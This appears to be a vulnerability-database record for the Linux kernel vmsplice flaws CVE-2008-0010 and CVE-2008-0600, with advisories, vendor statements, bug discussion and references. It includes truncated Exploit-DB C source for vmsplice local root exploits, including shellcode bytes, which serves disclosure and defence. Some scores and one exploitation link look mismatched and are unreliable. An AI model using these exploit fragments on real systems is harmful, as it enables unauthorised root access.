CVE-2008-0010
Published 2008-02-12. CVE-2008-0010: The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference…
Priority: P4 · 15 · low · CVSS 2.0 score 2.1
Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 0.89% (55.0th percentile)
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allows local users to read from arbitrary kernel memory locations.
Affected
69 ranges · showing 25 (the version range and fixed-in columns were not captured in this record; all listed ranges are for the same vendor and product)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 2.1 | LOW | AV:L/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 2.1 | LOW | — |
| vendor_redhat | — | 2.1 | LOW | — |
GHSA
GHSA-xpw8-fgcp-2cwc: The copy_from_user_mmap_sem function in fs/splice
ghsa_unreviewed · 2022-05-01 · CVE-2008-0010 [LOW] · CWE-20
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allows local users to read from arbitrary kernel memory locations.
GHSA
GHSA-vv62-ccxv-738x: The vmsplice_to_pipe function in Linux kernel 2
ghsa_unreviewed · 2022-05-01 · CVSS 2.1 · CVE-2008-0600 [LOW] · CWE-94
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
VulnCheck
Linux Kernel Improper Control of Generation of Code ('Code Injection')
vulncheck · 2008 · CVSS 2.1 · CVE-2008-0600 [LOW]
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Affected: Linux Kernel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/SSH+new+brute+force+tool/9370/
Red Hat
kernel vmsplice_to_pipe flaw
vendor_redhat · 2008-02-09 · CVSS 2.1 · CVE-2008-0600 [LOW] · CWE-119
The vmsplice_to_pipe function in Linux kernel 2.6.17 through 2.6.24.1 does not validate a certain userspace pointer before dereference, which allows local users to gain root privileges via crafted arguments in a vmsplice system call, a different vulnerability than CVE-2008-0009 and CVE-2008-0010.
Statement: This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4.
Red Hat
CVE-2008-0010: The copy_from_user_mmap_sem function in fs/splice
vendor_redhat · CVSS 2.1 · CVE-2008-0010 [LOW]
The copy_from_user_mmap_sem function in fs/splice.c in the Linux kernel 2.6.22 through 2.6.24 does not validate a certain userspace pointer before dereference, which allows local users to read from arbitrary kernel memory locations.
Statement: Not vulnerable. This issue did not affect the versions of the Linux kernel as shipped with Red Hat Enterprise Linux 2.1, 3, 4, or 5.
No detection rules found.
Exploit-DB
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
exploitdb · 2008-02-09 · CVE-2008-0600
Linux Kernel 2.6.17
The exploit source as captured in this record (header file names were stripped from the `#include` lines and the listing is cut off):

```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)
struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0
```
Exploit-DB
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1)
exploitdb · 2008-02-09 · CVE-2008-0600
Linux Kernel 2.6.23
The exploit source as captured in this record (header file names were stripped from the `#include` lines and the listing is cut off mid-line):

```c
#include
#include
#include
#include
#include
#define TARGET_PATTERN " sys_vm86old"
#define TARGET_SYSCALL 113
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#define gimmeroot() syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
#define TRAMP_CODE (void *) trampoline
#define TRAMP_SIZE ( sizeof(trampoline) - 1 )
unsigned char trampoline[] =
    "\x8b\x5c\x24\x04"         /* mov 0x4(%esp),%ebx */
    "\x8b\x4c\x24\x08"         /* mov 0x8(%esp),%ecx */
    "\x81\xfb\x69\x7a\x00\x00" /* cmp $31337,%ebx */
    "\x75\x02"                 /* jne +2 */
    "\xff\xd1"                 /* call *%ecx */
    "\xb8\xea\xff\xff\xff"     /* mov $-EINVAL,%eax */
    "\xc3"                     /* ret */
;
void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror
```
Bugzilla
CVE-2008-0600 kernel vmsplice_to_pipe flaw
bugzilla · 2008-02-10 · CVSS 2.1 · CVE-2008-0600 [LOW]
A new system call named vmsplice() was introduced in the 2.6.17 release of the Linux kernel.
COSEINC reported two issues affecting vmsplice, CVE-2008-0009 and CVE-2008-0010.
On Saturday 20080210 a public exploit was released that utilised a similar flaw in vmsplice (vmsplice_to_pipe function) to allow a local user to gain privileges on some architectures.
See also http://marc.info/?t=120263655300003&r=1&w=2
This issue will affect kernels 2.6.17+ and therefore affected Red Hat Enterprise Linux 5, but not Red Hat Enterprise Linux 4, 3, or 2.1.
Discussion:
Note that there may be a little confusion as there are actually three vmsplice issues:
CVE-2008-0009 is already fixed upstream, does not affect any RHEL, has no public exploit. Upstream pat
Bugzilla
CVE-2008-0009 kernel: Inappropriate dereference of user-supplied memory pointers
bugzilla · 2008-02-01 · CVSS 2.1 · CVE-2008-0009 [LOW]
Description of problem:
A new system call named vmsplice() was introduced in the 2.6.17 release of the Linux kernel.
Inappropriate dereference of user-supplied memory pointers in the code beginning at line 1378 in the vmsplice_to_user() kernel function (fs/splice.c):
The patch for this issue not provided by the reporter.
Discussion:
see bug #432251
---
There was a bit of confusion as the code changed since introduction 2.6.17, so Red Hat Enterprise Linux kernels had code different to upstream.
CVE-2008-0009 and CVE-2008-0010 only affected kernels 2.6.22+ so Red Hat Enterprise Linux was not affected.
CVE-2008-0600 affected kernels 2.6.17+ so affects Red Hat Enterprise Linux 5.
Closing this CVE-2008-000
References
- http://isec.pl/vulnerabilities/isec-0026-vmsplice_to_kernel.txt
- http://secunia.com/advisories/28835
- http://secunia.com/advisories/28875
- http://secunia.com/advisories/28896
- http://www.debian.org/security/2008/dsa-1494
- http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.24.1
- http://www.securityfocus.com/archive/1/487982/100/0/threaded
- http://www.securityfocus.com/bid/27704
- http://www.securityfocus.com/bid/27796
- http://www.vupen.com/english/advisories/2008/0487/references
- https://www.exploit-db.com/exploits/5093
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00254.html
- https://www.redhat.com/archives/fedora-package-announce/2008-February/msg00255.html